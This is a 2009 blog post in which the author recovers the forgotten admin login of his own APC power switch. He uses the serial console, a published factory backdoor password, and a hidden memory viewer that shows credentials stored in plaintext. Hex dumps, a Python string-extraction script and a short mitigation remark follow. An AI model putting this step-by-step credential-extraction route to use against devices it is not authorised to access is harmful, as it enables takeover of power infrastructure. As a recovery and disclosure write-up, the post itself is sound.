Archive for March, 2009

Hacking an APC9211

Sunday, March 22nd, 2009

This morning, after being frustrated trying to get a USB drive to work properly on a Linux machine, I turned my attention to breaking into an APC Power Switch I had acquired but had not had the opportunity to reset and recover before I had to install it. This would be simple if I could reset the switch during a reboot; unfortunately, doing so would reboot several servers that needed to stay up and available.

So I went searching a bit and found that this APC Power Switch is vulnerable to a local attack (one needing access to the serial console) that reveals both the currently defined administrative user name and the password associated with that account. The vulnerability was published against a different, more recent, version of the software than the one running on my device. I was hopeful that my older version would also be vulnerable.

The first step is to connect to the serial port on the device with a standard null-modem cable at 2400 baud, 8-N-1. At the User Name : prompt enter apc, and at the Password : prompt enter the factory password: TENmanUFactOryPOWER

This drops you to the Factory Menu, which looks like this (each line is a selection key followed by the stored value; item 1 shows the management card model, AP9606, and item 6 its firmware version, v2.5.3):

User Name : apc
Password  : *******************

Factory Menu
<ctrl -A> to exit

1  AP9606
2  WA0033002610
3  10
4  08/08/2000
5  00 C0 B7 63 FA F1
6  v2.5.3
7  A
8  A
9  198.180.62.87
A  255.255.255.240
B  198.180.62.81
C
D
E
F
G

The instructions I found said to enter 13 at this point, which drops you to this prompt:

Selection> 13

Enter byte address in Hex(XXXX):

The instructions further indicated that the address containing the information was 1d10. However, in my version of the software this is what I saw:

Enter byte address in Hex(XXXX): 1d10

1D10   FF FF FF FF FF FF FF FF  ........
1D18   FF FF FF FF FF FF FF FF  ........
1D20   FF FF FF FF FF FF FF FF  ........
1D28   FF FF FF FF FF FF FF FF  ........
1D30   FF FF FF FF FF FF FF FF  ........
1D38   FF FF FF FF FF FF FF FF  ........
1D40   FF FF FF FF FF FF FF FF  ........
1D48   FF FF FF FF FF FF FF FF  ........
1D50   FF FF FF FF FF FF FF FF  ........
1D58   FF FF FF FF FF FF FF FF  ........
1D60   FF FF FF FF FF FF FF FF  ........
1D68   FF FF FF FF FF FF FF FF  ........
1D70   FF FF FF FF FF FF FF FF  ........
1D78   FF FF FF FF FF FF FF FF  ........
1D80   FF FF FF FF FF FF FF FF  ........
1D88   FF FF FF FF FF FF FF FF  ........

<sp>nxt,b-bck,p-pch,other-exit

Obviously there is no useful information there: a region that reads back as nothing but FF bytes has simply never been written. So I started systematically trying other addresses to see whether the information I was after was stored somewhere else. After about five minutes of trial and error I found it at 1c2:

Enter byte address in Hex(XXXX): 1c2

01C2   FF FF FF FF FF FF FF FF  ........
01CA   FF FF FF FF FF FF FF 50  .......P
01D2   46 61 64 6D 69 6E 00 64  Fadmin.d
01DA   6D 69 6E 00 68 69 68 61  min.hiha
01E2   74 31 31 00 00 00 FF 64  t11....d
01EA   65 76 69 63 65 00 FF FF  evice...
01F2   FF FF 61 70 63 00 FF FF  ..apc...
01FA   FF FF FF FF FF 72 6F 62  .....rob
0202   68 61 72 72 69 73 68 61  harrisha
020A   73 61 62 61 62 79 00 FF  sababy..
0212   FF FF FF FF FF FF FF FF  ........
021A   FF FF FF FF FF FF 64 65  ......de
0222   76 69 63 65 20 75 73 65  vice use
022A   72 20 70 68 72 61 73 65  r phrase
0232   00 FF FF FF FF FF FF FF  ........
023A   FF FF FF FF FF FF FF 00  ........

<sp>nxt,b-bck,p-pch,other-exit

In case you don't see it, the user ID is admin and the password is hihat11. Both are stored as plain NUL-terminated ASCII, so read the right-hand column across the line breaks: admin occupies 01D3 through 01D7, and hihat11 spans 01DE through 01E4.
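Reading the ASCII column across line breaks gets tedious once you are paging through more than one region. As an added example (not code from the original post, and nothing APC ships), here is a small Python script that parses a pasted byte-viewer dump, flags regions that are entirely 0xFF (unprogrammed, like the 1d10 dump above) and lists every run of printable ASCII with its address. The two sample dumps embedded in it are reconstructed from the listings above; the viewer's line layout (four hex digits of address, eight bytes, an ASCII column) is assumed from those listings.

```python
"""Pull stored strings out of an APC factory-menu byte-viewer dump.

Added example, not code from the original post or from APC. The line
layout (4-digit hex address, eight hex bytes, ASCII column) is assumed
from the dumps shown in the post.
"""
import re
from typing import Dict, List, Tuple

ADDR = re.compile(r"[0-9A-Fa-f]{4}")
HEX2 = re.compile(r"[0-9A-Fa-f]{2}")

# Constructed sample inputs: the start of the 1d10 dump and the whole 1c2
# dump from the post, pasted as the terminal shows them, prompt and
# paging trailer included.
SAMPLE_1D10 = """\
Enter byte address in Hex(XXXX): 1d10

1D10   FF FF FF FF FF FF FF FF  ........
1D18   FF FF FF FF FF FF FF FF  ........

<sp>nxt,b-bck,p-pch,other-exit
"""

SAMPLE_01C2 = """\
Enter byte address in Hex(XXXX): 1c2

01C2   FF FF FF FF FF FF FF FF  ........
01CA   FF FF FF FF FF FF FF 50  .......P
01D2   46 61 64 6D 69 6E 00 64  Fadmin.d
01DA   6D 69 6E 00 68 69 68 61  min.hiha
01E2   74 31 31 00 00 00 FF 64  t11....d
01EA   65 76 69 63 65 00 FF FF  evice...
01F2   FF FF 61 70 63 00 FF FF  ..apc...
01FA   FF FF FF FF FF 72 6F 62  .....rob
0202   68 61 72 72 69 73 68 61  harrisha
020A   73 61 62 61 62 79 00 FF  sababy..
0212   FF FF FF FF FF FF FF FF  ........
021A   FF FF FF FF FF FF 64 65  ......de
0222   76 69 63 65 20 75 73 65  vice use
022A   72 20 70 68 72 61 73 65  r phrase
0232   00 FF FF FF FF FF FF FF  ........
023A   FF FF FF FF FF FF FF 00  ........

<sp>nxt,b-bck,p-pch,other-exit
"""


def parse_dump(text: str) -> Dict[int, int]:
    """Map address -> byte for every data line. Prompts, blank lines and
    the paging trailer do not look like 'ADDR hh hh ...' and are skipped."""
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 2 or not ADDR.fullmatch(tok[0]):
            continue
        data = tok[1:9]  # the viewer prints eight bytes per line
        if not all(HEX2.fullmatch(t) for t in data):
            continue
        base = int(tok[0], 16)
        for offset, t in enumerate(data):
            mem[base + offset] = int(t, 16)
    return mem


def is_blank(mem: Dict[int, int]) -> bool:
    """True when every dumped byte is 0xFF, i.e. the region was never written."""
    return bool(mem) and all(b == 0xFF for b in mem.values())


def extract_strings(mem: Dict[int, int], min_len: int = 3) -> List[Tuple[int, str]]:
    """Return (address, text) for each run of at least min_len printable
    ASCII bytes. A run ends at any non-printable byte (the 0x00 terminator
    or a 0xFF erased cell) or at a gap in the dumped addresses."""
    found: List[Tuple[int, str]] = []
    start, run = 0, ""
    for addr in sorted(mem):
        if run and addr != start + len(run):  # address gap closes the run
            if len(run) >= min_len:
                found.append((start, run))
            run = ""
        b = mem[addr]
        if 0x20 <= b < 0x7F:
            if not run:
                start = addr
            run += chr(b)
        else:
            if len(run) >= min_len:
                found.append((start, run))
            run = ""
    if len(run) >= min_len:
        found.append((start, run))
    return found


def report(label: str, dump: str) -> List[str]:
    """Human-readable result lines for one pasted dump."""
    mem = parse_dump(dump)
    if is_blank(mem):
        return [f"{label}: {len(mem)} bytes, all 0xFF, nothing stored here"]
    return [f"{label}: {addr:04X}  {text!r}" for addr, text in extract_strings(mem)]


if __name__ == "__main__":
    for label, dump in (("1d10", SAMPLE_1D10), ("1c2", SAMPLE_01C2)):
        print("\n".join(report(label, dump)))
```

Run it and the 1d10 region is reported as blank, while the 1c2 region yields hihat11 at 01DE, apc at 01F4, and the longer phrases at 01FF and 0220. The script reports what is literally in memory, so the admin name comes out as PFadmin: the two printable bytes just ahead of it (0x50 0x46) belong to whatever precedes the name field, and it is still up to you to recognise the field boundary. To scan a larger area, page through the viewer with the space bar, paste the whole capture into one string and hand it to parse_dump; lines that are not dump lines are ignored.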

After gaining that information I was able to log in easily, reset the password to something I will remember, and configure the network interface to enable web management of the device. Note that changing the admin password does nothing about the route used here: the factory account still accepts TENmanUFactOryPOWER on the serial console regardless of what the admin password is, so anyone with physical access to that port can repeat these steps. Controlling access to the console port is the only real mitigation.